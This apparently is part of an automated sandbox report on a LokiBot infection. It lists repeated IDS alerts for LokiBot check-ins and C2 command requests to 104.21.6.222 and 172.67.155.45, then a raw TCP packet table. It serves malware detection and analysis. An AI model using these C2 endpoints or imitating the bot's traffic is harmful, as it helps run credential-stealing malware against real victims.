                                    07/21/21-17:02:26.075061TCP2025381ET TROJAN LokiBot Checkin4980180192.168.2.3104.21.6.222
                                    07/21/21-17:02:26.650096TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980280192.168.2.3172.67.155.45
                                    07/21/21-17:02:26.650096TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980280192.168.2.3172.67.155.45
                                    07/21/21-17:02:26.650096TCP2025381ET TROJAN LokiBot Checkin4980280192.168.2.3172.67.155.45
                                    07/21/21-17:02:27.149859TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980380192.168.2.3172.67.155.45
                                    07/21/21-17:02:27.149859TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980380192.168.2.3172.67.155.45
                                    07/21/21-17:02:27.149859TCP2025381ET TROJAN LokiBot Checkin4980380192.168.2.3172.67.155.45
                                    07/21/21-17:02:27.624312TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.2.3104.21.6.222
                                    07/21/21-17:02:27.624312TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.2.3104.21.6.222
                                    07/21/21-17:02:27.624312TCP2025381ET TROJAN LokiBot Checkin4980480192.168.2.3104.21.6.222
                                    07/21/21-17:02:28.139416TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.2.3104.21.6.222
                                    07/21/21-17:02:28.139416TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.2.3104.21.6.222
                                    07/21/21-17:02:28.139416TCP2025381ET TROJAN LokiBot Checkin4980580192.168.2.3104.21.6.222
                                    07/21/21-17:02:28.618676TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980680192.168.2.3172.67.155.45
                                    07/21/21-17:02:28.618676TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980680192.168.2.3172.67.155.45
                                    07/21/21-17:02:28.618676TCP2025381ET TROJAN LokiBot Checkin4980680192.168.2.3172.67.155.45
                                    07/21/21-17:02:29.123700TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980780192.168.2.3172.67.155.45
                                    07/21/21-17:02:29.123700TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980780192.168.2.3172.67.155.45
                                    07/21/21-17:02:29.123700TCP2025381ET TROJAN LokiBot Checkin4980780192.168.2.3172.67.155.45
                                    07/21/21-17:02:29.594771TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980880192.168.2.3172.67.155.45
                                    07/21/21-17:02:29.594771TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980880192.168.2.3172.67.155.45
                                    07/21/21-17:02:29.594771TCP2025381ET TROJAN LokiBot Checkin4980880192.168.2.3172.67.155.45
                                    07/21/21-17:02:30.220814TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980980192.168.2.3104.21.6.222
                                    07/21/21-17:02:30.220814TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980980192.168.2.3104.21.6.222
                                    07/21/21-17:02:30.220814TCP2025381ET TROJAN LokiBot Checkin4980980192.168.2.3104.21.6.222
                                    07/21/21-17:02:30.746183TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981080192.168.2.3172.67.155.45
                                    07/21/21-17:02:30.746183TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981080192.168.2.3172.67.155.45
                                    07/21/21-17:02:30.746183TCP2025381ET TROJAN LokiBot Checkin4981080192.168.2.3172.67.155.45
                                    07/21/21-17:02:31.359135TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.2.3172.67.155.45
                                    07/21/21-17:02:31.359135TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.3172.67.155.45
                                    07/21/21-17:02:31.359135TCP2025381ET TROJAN LokiBot Checkin4981180192.168.2.3172.67.155.45
                                    07/21/21-17:02:31.944171TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.2.3104.21.6.222
                                    07/21/21-17:02:31.944171TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.2.3104.21.6.222
                                    07/21/21-17:02:31.944171TCP2025381ET TROJAN LokiBot Checkin4981280192.168.2.3104.21.6.222
                                    07/21/21-17:02:32.425812TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.3104.21.6.222
                                    07/21/21-17:02:32.425812TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.3104.21.6.222
                                    07/21/21-17:02:32.425812TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.3104.21.6.222
                                    07/21/21-17:02:32.886717TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.3172.67.155.45
                                    07/21/21-17:02:32.886717TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.3172.67.155.45
                                    07/21/21-17:02:32.886717TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.3172.67.155.45
                                    07/21/21-17:02:33.415034TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.2.3172.67.155.45
                                    07/21/21-17:02:33.415034TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.2.3172.67.155.45
                                    07/21/21-17:02:33.415034TCP2025381ET TROJAN LokiBot Checkin4981580192.168.2.3172.67.155.45
                                    07/21/21-17:02:33.875913TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981680192.168.2.3172.67.155.45
                                    07/21/21-17:02:33.875913TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981680192.168.2.3172.67.155.45
                                    07/21/21-17:02:33.875913TCP2025381ET TROJAN LokiBot Checkin4981680192.168.2.3172.67.155.45
                                    07/21/21-17:02:34.390111TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.3104.21.6.222
                                    07/21/21-17:02:34.390111TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.3104.21.6.222
                                    07/21/21-17:02:34.390111TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.3104.21.6.222
                                    07/21/21-17:02:34.914148TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.3172.67.155.45
                                    07/21/21-17:02:34.914148TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.3172.67.155.45
                                    07/21/21-17:02:34.914148TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.3172.67.155.45
                                    07/21/21-17:02:35.455161TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.2.3104.21.6.222
                                    07/21/21-17:02:35.455161TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.2.3104.21.6.222
                                    07/21/21-17:02:35.455161TCP2025381ET TROJAN LokiBot Checkin4981980192.168.2.3104.21.6.222
                                    07/21/21-17:02:35.957509TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.3104.21.6.222
                                    07/21/21-17:02:35.957509TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.3104.21.6.222
                                    07/21/21-17:02:35.957509TCP2025381ET TROJAN LokiBot Checkin4982080192.168.2.3104.21.6.222
                                    07/21/21-17:02:36.779629TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.3172.67.155.45
                                    07/21/21-17:02:36.779629TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.3172.67.155.45
                                    07/21/21-17:02:36.779629TCP2025381ET TROJAN LokiBot Checkin4982180192.168.2.3172.67.155.45
                                    07/21/21-17:02:37.265545TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.2.3104.21.6.222
                                    07/21/21-17:02:37.265545TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.2.3104.21.6.222
                                    07/21/21-17:02:37.265545TCP2025381ET TROJAN LokiBot Checkin4982280192.168.2.3104.21.6.222
                                    07/21/21-17:02:37.872285TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.3104.21.6.222
                                    07/21/21-17:02:37.872285TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.3104.21.6.222
                                    07/21/21-17:02:37.872285TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.3104.21.6.222
                                    07/21/21-17:02:38.354510TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982480192.168.2.3172.67.155.45
                                    07/21/21-17:02:38.354510TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982480192.168.2.3172.67.155.45
                                    07/21/21-17:02:38.354510TCP2025381ET TROJAN LokiBot Checkin4982480192.168.2.3172.67.155.45
                                    07/21/21-17:02:38.846387TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.2.3104.21.6.222
                                    07/21/21-17:02:38.846387TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.2.3104.21.6.222
                                    07/21/21-17:02:38.846387TCP2025381ET TROJAN LokiBot Checkin4982580192.168.2.3104.21.6.222
                                    07/21/21-17:02:39.462964TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.2.3104.21.6.222
                                    07/21/21-17:02:39.462964TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.2.3104.21.6.222
                                    07/21/21-17:02:39.462964TCP2025381ET TROJAN LokiBot Checkin4982680192.168.2.3104.21.6.222
                                    07/21/21-17:02:39.966712TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982780192.168.2.3104.21.6.222
                                    07/21/21-17:02:39.966712TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982780192.168.2.3104.21.6.222
                                    07/21/21-17:02:39.966712TCP2025381ET TROJAN LokiBot Checkin4982780192.168.2.3104.21.6.222
                                    07/21/21-17:02:40.433906TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982880192.168.2.3104.21.6.222
                                    07/21/21-17:02:40.433906TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982880192.168.2.3104.21.6.222
                                    07/21/21-17:02:40.433906TCP2025381ET TROJAN LokiBot Checkin4982880192.168.2.3104.21.6.222
                                    07/21/21-17:02:40.967167TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982980192.168.2.3104.21.6.222
                                    07/21/21-17:02:40.967167TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982980192.168.2.3104.21.6.222
                                    07/21/21-17:02:40.967167TCP2025381ET TROJAN LokiBot Checkin4982980192.168.2.3104.21.6.222
                                    07/21/21-17:02:41.554207TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983180192.168.2.3172.67.155.45
                                    07/21/21-17:02:41.554207TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983180192.168.2.3172.67.155.45
                                    07/21/21-17:02:41.554207TCP2025381ET TROJAN LokiBot Checkin4983180192.168.2.3172.67.155.45
                                    07/21/21-17:02:42.040061TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983280192.168.2.3104.21.6.222
                                    07/21/21-17:02:42.040061TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983280192.168.2.3104.21.6.222
                                    07/21/21-17:02:42.040061TCP2025381ET TROJAN LokiBot Checkin4983280192.168.2.3104.21.6.222
                                    07/21/21-17:02:42.533368TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983380192.168.2.3104.21.6.222
                                    07/21/21-17:02:42.533368TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983380192.168.2.3104.21.6.222
                                    07/21/21-17:02:42.533368TCP2025381ET TROJAN LokiBot Checkin4983380192.168.2.3104.21.6.222
                                    07/21/21-17:02:43.028631TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983480192.168.2.3172.67.155.45
                                    07/21/21-17:02:43.028631TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983480192.168.2.3172.67.155.45
                                    07/21/21-17:02:43.028631TCP2025381ET TROJAN LokiBot Checkin4983480192.168.2.3172.67.155.45
                                    07/21/21-17:02:43.538465TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983680192.168.2.3172.67.155.45
                                    07/21/21-17:02:43.538465TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983680192.168.2.3172.67.155.45
                                    07/21/21-17:02:43.538465TCP2025381ET TROJAN LokiBot Checkin4983680192.168.2.3172.67.155.45
                                    07/21/21-17:02:44.281989TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983780192.168.2.3104.21.6.222
                                    07/21/21-17:02:44.281989TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983780192.168.2.3104.21.6.222
                                    07/21/21-17:02:44.281989TCP2025381ET TROJAN LokiBot Checkin4983780192.168.2.3104.21.6.222
                                    07/21/21-17:02:44.910721TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983880192.168.2.3172.67.155.45
                                    07/21/21-17:02:44.910721TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983880192.168.2.3172.67.155.45
                                    07/21/21-17:02:44.910721TCP2025381ET TROJAN LokiBot Checkin4983880192.168.2.3172.67.155.45
                                    07/21/21-17:02:45.875521TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983980192.168.2.3172.67.155.45
                                    07/21/21-17:02:45.875521TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983980192.168.2.3172.67.155.45
                                    07/21/21-17:02:45.875521TCP2025381ET TROJAN LokiBot Checkin4983980192.168.2.3172.67.155.45
                                    07/21/21-17:02:47.515414TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984080192.168.2.3104.21.6.222
                                    07/21/21-17:02:47.515414TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984080192.168.2.3104.21.6.222
                                    07/21/21-17:02:47.515414TCP2025381ET TROJAN LokiBot Checkin4984080192.168.2.3104.21.6.222
                                    07/21/21-17:02:48.052467TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984180192.168.2.3104.21.6.222
                                    07/21/21-17:02:48.052467TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984180192.168.2.3104.21.6.222
                                    07/21/21-17:02:48.052467TCP2025381ET TROJAN LokiBot Checkin4984180192.168.2.3104.21.6.222
                                    07/21/21-17:02:48.613532TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984280192.168.2.3172.67.155.45
                                    07/21/21-17:02:48.613532TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984280192.168.2.3172.67.155.45
                                    07/21/21-17:02:48.613532TCP2025381ET TROJAN LokiBot Checkin4984280192.168.2.3172.67.155.45
                                    07/21/21-17:02:49.200374TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984380192.168.2.3172.67.155.45
                                    07/21/21-17:02:49.200374TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984380192.168.2.3172.67.155.45
                                    07/21/21-17:02:49.200374TCP2025381ET TROJAN LokiBot Checkin4984380192.168.2.3172.67.155.45
                                    07/21/21-17:02:49.807202TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984480192.168.2.3104.21.6.222
                                    07/21/21-17:02:49.807202TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984480192.168.2.3104.21.6.222
                                    07/21/21-17:02:49.807202TCP2025381ET TROJAN LokiBot Checkin4984480192.168.2.3104.21.6.222
                                    07/21/21-17:02:50.493603TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.3172.67.155.45
                                    07/21/21-17:02:50.493603TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.3172.67.155.45
                                    07/21/21-17:02:50.493603TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.3172.67.155.45
                                    07/21/21-17:02:51.150121TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984680192.168.2.3172.67.155.45
                                    07/21/21-17:02:51.150121TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984680192.168.2.3172.67.155.45
                                    07/21/21-17:02:51.150121TCP2025381ET TROJAN LokiBot Checkin4984680192.168.2.3172.67.155.45
                                    07/21/21-17:02:51.615075TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984780192.168.2.3104.21.6.222
                                    07/21/21-17:02:51.615075TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984780192.168.2.3104.21.6.222
                                    07/21/21-17:02:51.615075TCP2025381ET TROJAN LokiBot Checkin4984780192.168.2.3104.21.6.222
                                    07/21/21-17:02:52.226164TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984880192.168.2.3172.67.155.45
                                    07/21/21-17:02:52.226164TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984880192.168.2.3172.67.155.45
                                    07/21/21-17:02:52.226164TCP2025381ET TROJAN LokiBot Checkin4984880192.168.2.3172.67.155.45
                                    07/21/21-17:02:53.008341TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984980192.168.2.3104.21.6.222
                                    07/21/21-17:02:53.008341TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984980192.168.2.3104.21.6.222
                                    07/21/21-17:02:53.008341TCP2025381ET TROJAN LokiBot Checkin4984980192.168.2.3104.21.6.222
                                    07/21/21-17:02:53.500319TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985080192.168.2.3104.21.6.222
                                    07/21/21-17:02:53.500319TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.2.3104.21.6.222
                                    07/21/21-17:02:53.500319TCP2025381ET TROJAN LokiBot Checkin4985080192.168.2.3104.21.6.222
                                    07/21/21-17:02:54.057067TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.2.3172.67.155.45
                                    07/21/21-17:02:54.057067TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.2.3172.67.155.45
                                    07/21/21-17:02:54.057067TCP2025381ET TROJAN LokiBot Checkin4985180192.168.2.3172.67.155.45
                                    07/21/21-17:02:54.588301TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.2.3104.21.6.222
                                    07/21/21-17:02:54.588301TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.2.3104.21.6.222
                                    07/21/21-17:02:54.588301TCP2025381ET TROJAN LokiBot Checkin4985280192.168.2.3104.21.6.222
                                    07/21/21-17:02:55.084564TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.2.3172.67.155.45
                                    07/21/21-17:02:55.084564TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.2.3172.67.155.45
                                    07/21/21-17:02:55.084564TCP2025381ET TROJAN LokiBot Checkin4985380192.168.2.3172.67.155.45
                                    07/21/21-17:02:55.635202TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985480192.168.2.3104.21.6.222
                                    07/21/21-17:02:55.635202TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985480192.168.2.3104.21.6.222
                                    07/21/21-17:02:55.635202TCP2025381ET TROJAN LokiBot Checkin4985480192.168.2.3104.21.6.222
                                    07/21/21-17:02:56.175478TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.2.3104.21.6.222
                                    07/21/21-17:02:56.175478TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.2.3104.21.6.222
                                    07/21/21-17:02:56.175478TCP2025381ET TROJAN LokiBot Checkin4985580192.168.2.3104.21.6.222
                                    07/21/21-17:02:56.689731TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.2.3104.21.6.222
                                    07/21/21-17:02:56.689731TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.2.3104.21.6.222
                                    07/21/21-17:02:56.689731TCP2025381ET TROJAN LokiBot Checkin4985680192.168.2.3104.21.6.222
                                    07/21/21-17:02:57.212747TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.2.3172.67.155.45
                                    07/21/21-17:02:57.212747TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.2.3172.67.155.45
                                    07/21/21-17:02:57.212747TCP2025381ET TROJAN LokiBot Checkin4985780192.168.2.3172.67.155.45
                                    07/21/21-17:02:57.699677TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985880192.168.2.3104.21.6.222
                                    07/21/21-17:02:57.699677TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.2.3104.21.6.222
                                    07/21/21-17:02:57.699677TCP2025381ET TROJAN LokiBot Checkin4985880192.168.2.3104.21.6.222
                                    07/21/21-17:02:58.192042TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985980192.168.2.3172.67.155.45
                                    07/21/21-17:02:58.192042TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985980192.168.2.3172.67.155.45
                                    07/21/21-17:02:58.192042TCP2025381ET TROJAN LokiBot Checkin4985980192.168.2.3172.67.155.45
                                    07/21/21-17:02:58.763149TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986080192.168.2.3104.21.6.222
                                    07/21/21-17:02:58.763149TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986080192.168.2.3104.21.6.222
                                    07/21/21-17:02:58.763149TCP2025381ET TROJAN LokiBot Checkin4986080192.168.2.3104.21.6.222
                                    07/21/21-17:02:59.310832TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986180192.168.2.3172.67.155.45
                                    07/21/21-17:02:59.310832TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986180192.168.2.3172.67.155.45
                                    07/21/21-17:02:59.310832TCP2025381ET TROJAN LokiBot Checkin4986180192.168.2.3172.67.155.45

                                    Network Port Distribution

                                    TCP Packets

                                    Jul 21, 2021 17:02:02.722496033 CEST4975380192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:02:02.742212057 CEST8049753172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:02.742388010 CEST4975380192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:02:02.762660980 CEST8049753172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:02.988822937 CEST8049753172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:02.988967896 CEST8049753172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:02.989059925 CEST4975380192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:02:02.989089012 CEST4975380192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:02:03.008855104 CEST8049753172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:03.261375904 CEST4975480192.168.2.3104.21.6.222
                                    Jul 21, 2021 17:02:03.279026985 CEST8049754104.21.6.222192.168.2.3
                                    Jul 21, 2021 17:02:03.279201031 CEST4975480192.168.2.3104.21.6.222
                                    Jul 21, 2021 17:02:03.283216000 CEST4975480192.168.2.3104.21.6.222
                                    Jul 21, 2021 17:02:03.301045895 CEST8049754104.21.6.222192.168.2.3
                                    Jul 21, 2021 17:02:03.301315069 CEST4975480192.168.2.3104.21.6.222
                                    Jul 21, 2021 17:02:03.319086075 CEST8049754104.21.6.222192.168.2.3
                                    Jul 21, 2021 17:02:03.883820057 CEST8049754104.21.6.222192.168.2.3
                                    Jul 21, 2021 17:02:03.883980989 CEST4975480192.168.2.3104.21.6.222
                                    Jul 21, 2021 17:02:03.884008884 CEST8049754104.21.6.222192.168.2.3
                                    Jul 21, 2021 17:02:03.884124994 CEST4975480192.168.2.3104.21.6.222
                                    Jul 21, 2021 17:02:03.901803017 CEST8049754104.21.6.222192.168.2.3
                                    Jul 21, 2021 17:02:04.112144947 CEST4975580192.168.2.3104.21.6.222
                                    Jul 21, 2021 17:02:04.131992102 CEST8049755104.21.6.222192.168.2.3
                                    Jul 21, 2021 17:02:04.132173061 CEST4975580192.168.2.3104.21.6.222
                                    Jul 21, 2021 17:02:04.137002945 CEST4975580192.168.2.3104.21.6.222
                                    Jul 21, 2021 17:02:04.156883001 CEST8049755104.21.6.222192.168.2.3
                                    Jul 21, 2021 17:02:04.156979084 CEST4975580192.168.2.3104.21.6.222
                                    Jul 21, 2021 17:02:04.177351952 CEST8049755104.21.6.222192.168.2.3
                                    Jul 21, 2021 17:02:04.457256079 CEST8049755104.21.6.222192.168.2.3
                                    Jul 21, 2021 17:02:04.457283974 CEST8049755104.21.6.222192.168.2.3
                                    Jul 21, 2021 17:02:04.457401037 CEST4975580192.168.2.3104.21.6.222
                                    Jul 21, 2021 17:02:04.457436085 CEST4975580192.168.2.3104.21.6.222
                                    Jul 21, 2021 17:02:04.477554083 CEST8049755104.21.6.222192.168.2.3
                                    Jul 21, 2021 17:02:04.679862976 CEST4975680192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:02:04.697840929 CEST8049756172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:04.698050022 CEST4975680192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:02:04.701324940 CEST4975680192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:02:04.719387054 CEST8049756172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:04.719463110 CEST4975680192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:02:04.737749100 CEST8049756172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:04.987874985 CEST8049756172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:04.987901926 CEST8049756172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:04.988030910 CEST4975680192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:02:04.988063097 CEST4975680192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:02:05.005971909 CEST8049756172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:05.206079006 CEST4975780192.168.2.3104.21.6.222
                                    Jul 21, 2021 17:02:05.226026058 CEST8049757104.21.6.222192.168.2.3
                                    Jul 21, 2021 17:02:05.228559971 CEST4975780192.168.2.3104.21.6.222
                                    Jul 21, 2021 17:02:05.261212111 CEST4975780192.168.2.3104.21.6.222
                                    Jul 21, 2021 17:02:05.281182051 CEST8049757104.21.6.222192.168.2.3
                                    Jul 21, 2021 17:02:05.281430006 CEST4975780192.168.2.3104.21.6.222
                                    Jul 21, 2021 17:02:05.301263094 CEST8049757104.21.6.222192.168.2.3
                                    Jul 21, 2021 17:02:05.545480013 CEST8049757104.21.6.222192.168.2.3
                                    Jul 21, 2021 17:02:05.545766115 CEST8049757104.21.6.222192.168.2.3
                                    Jul 21, 2021 17:02:05.545918941 CEST4975780192.168.2.3104.21.6.222
                                    Jul 21, 2021 17:02:05.545969963 CEST4975780192.168.2.3104.21.6.222
                                    Jul 21, 2021 17:02:05.565723896 CEST8049757104.21.6.222192.168.2.3
                                    Jul 21, 2021 17:02:05.808661938 CEST4975880192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:02:05.826819897 CEST8049758172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:05.826915979 CEST4975880192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:02:05.829794884 CEST4975880192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:02:05.847807884 CEST8049758172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:05.847943068 CEST4975880192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:02:05.865773916 CEST8049758172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:06.098681927 CEST8049758172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:06.098881006 CEST4975880192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:02:06.098886967 CEST8049758172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:06.098988056 CEST4975880192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:02:06.117042065 CEST8049758172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:06.344536066 CEST4976280192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:02:06.364283085 CEST8049762172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:06.364415884 CEST4976280192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:02:06.367161036 CEST4976280192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:02:06.386913061 CEST8049762172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:06.387041092 CEST4976280192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:02:06.406985998 CEST8049762172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:06.655983925 CEST8049762172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:06.656018972 CEST8049762172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:06.656107903 CEST4976280192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:02:06.656187057 CEST4976280192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:02:06.676239967 CEST8049762172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:02:06.869424105 CEST4976380192.168.2.3104.21.6.222
                                    Jul 21, 2021 17:02:06.887665987 CEST8049763104.21.6.222192.168.2.3
                                    Jul 21, 2021 17:02:06.887799025 CEST4976380192.168.2.3104.21.6.222
                                    Jul 21, 2021 17:02:06.914597034 CEST4976380192.168.2.3104.21.6.222
                                    Jul 21, 2021 17:02:06.932777882 CEST8049763104.21.6.222192.168.2.3
                                    Jul 21, 2021 17:02:06.932962894 CEST4976380192.168.2.3104.21.6.222
